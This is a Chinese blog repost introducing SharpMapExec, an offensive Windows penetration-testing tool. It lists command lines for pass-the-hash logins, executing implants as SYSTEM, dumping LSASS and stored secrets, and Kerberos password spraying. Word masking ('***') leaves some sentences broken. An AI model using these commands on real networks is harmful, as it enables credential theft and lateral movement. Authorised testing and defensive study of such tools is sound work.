SharpMapExec:针对 *** 渗透测试高级瑞士Knife

访客4年前黑客文章642

SharpMapExec

SharpMapExec是一款针对 *** 渗透测试高级瑞士Knife,该工具基于CrackMapExec,可以将其理解为是CrackMapExec的优化版本。该工具的目的是简化 *** 渗透测试的任务操作,并提供一个多功能的渗透测试平台,该工具目前仅支持在Windows操作系统上运行,这也符合内部威胁模拟攻防的常见要求。

除了扫描访问权限外,它还可用于识别存在安全的错误配置以及过滤数据。数据过滤模块的核心实现思想是在远程计算机上执行最少的必要代码,为了完成这个任务,该工具将把所有的敏感数据下载到loot目录并在本地解析它们。

广大研究人员可以指定是否要使用Kerberos或NTLM身份验证,如果选择了Kerberos,那么该工具将创建一个令牌,并使用Rubeus导入或请求凭证。如果指定了NTLM,相应的工具将会创建一个线程并使用SharpKatz运行SetThreadToken(如果指定了NTLM散列)。

工具使用

SharpMapExec.exe

usage:

?

--- Smb ---

SharpMapExec.exe ntlm  *** b /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET

SharpMapExec.exe kerberos  *** b </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> ?/computername:TARGET

?

Available Smb modules

/m:shares

?

--- WinRm ---

SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET

SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH ?/domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> ?/computername:TARGET

?

Available WinRm modules

/m:exec /a:whoami (Invoke-Command)

/m:exec /a:C:\beacon.exe /system ?(Invoke-Command as System)

/m:comsvcs ?(Dump Lsass Process)

/m:secrets ?(Dump and Parse Sam, Lsa, and System Dpapi blobs)

/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)

/m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)

/m:download /path:C:\file /destination:file (Download File from Host)

?

--- Domain ---

SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC

SharpMapExec.exe tgtdeleg

*** B

可以用于扫描管理员访问或可访问的 *** B共享。

模块:

/m:shares ?(Scan enumerated shares for access)

WinRM

该模块内置了AMSI绕过、JEA语言中断和JEA函数分析等功能,可用于代码执行、扫描PsRemote访问、易受攻击的JEA节点和数据过滤。

Domain

当前支持域密码喷射,以及为当前用户创建TGT,该TGT可与/ticket参数一起使用以获取当前上下文。

工具使用样例

该工具支持在内存中执行大量的C#程序:

Kerberos密码喷射并扫描本地管理员访问:

该项目支持扫描JEA节点,将分析非默认命令的源代码,并检查节点是否未配置为no-language模式:

使用一个NT哈希扫描本地管理员密码复用:

大批量转储Lsass进程,并将其保存到loot文件夹:

在某些使用Kerberos的场景下,可能会要求用户同步DC时钟并设置DNS:

net time \\DC01.hackit.local /set

Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')

项目地址

SharpMapExec:【GitHub传送门

相关文章

如何找黑客,黑客都用什么语言

如何找黑客,黑客都用什么语言

一、如何找黑客接单流程 1、流程接单滴滴顺风车位于城市共享旅游,采用大数据算法和先进的匹配技术,一对一地连接每一位愿意一起旅行的车主和乘客。如何找都用什么语言滴滴共有两种模式,一种是抢订模式,另一种是...

核酸是什么(为什么确诊新冠肺炎需要核酸检测试剂盒?)

核苷酸诊断试剂盒是啥? l 病毒感染关键由遗传信息和蛋白质组成,病毒感染的遗传信息便是由一个或好几个核苷酸分子结构(DNA或RNA)构成的基因。新式新冠病毒(2019-nCoV)是一种RNA(脱氧核糖...

校盈易(校宝和校盈易哪个好用)

  这个就看你小我私家需求了吧,每个都有利益,每个又都有缺点,校宝应该算是最早从事这个行业的,也得到了融资,校管家主要是处事一些大型的机构,指南针/boss/指学针/。   看附子信息网你的需求了,我...

黑客技术模拟大全视频(黑客技术模拟大全视频教程)

黑客技术模拟大全视频(黑客技术模拟大全视频教程)

黑客是怎样练成的? 学习密码技术 作为一名优秀的黑客,密码技术也是不可或缺的。加密与解密都是重要的黑客技能,它在各种信息系统安全技术,如身份验证和数据完整和保密等方面,都有着极为广泛的应用。要有从解决...

勇往直前:新用户免费赚10元以上!

勇往直前是一个答题闯关类赚钱APP,新用户注册后支付1米即可激活帐号,立刻返1.5米现金,然后直接提现1米,秒到账,相当于0米激活,激活送聚宝盆,可以产米宝,还送金币,金币可以用来答题送米宝,米宝可以...

赤佬是什么意思,赤佬是骂人的意思吗

常州话里有许多 看上去好像粗话但实际上是亲戚朋友中间为了更好地表述浓厚情义才会讲的,不清楚这种内情的还以为常州人不文明,实际上大家常州人文明行为着呢!不相信你自己看! 讨论一下这种常州话你可以懂好多个...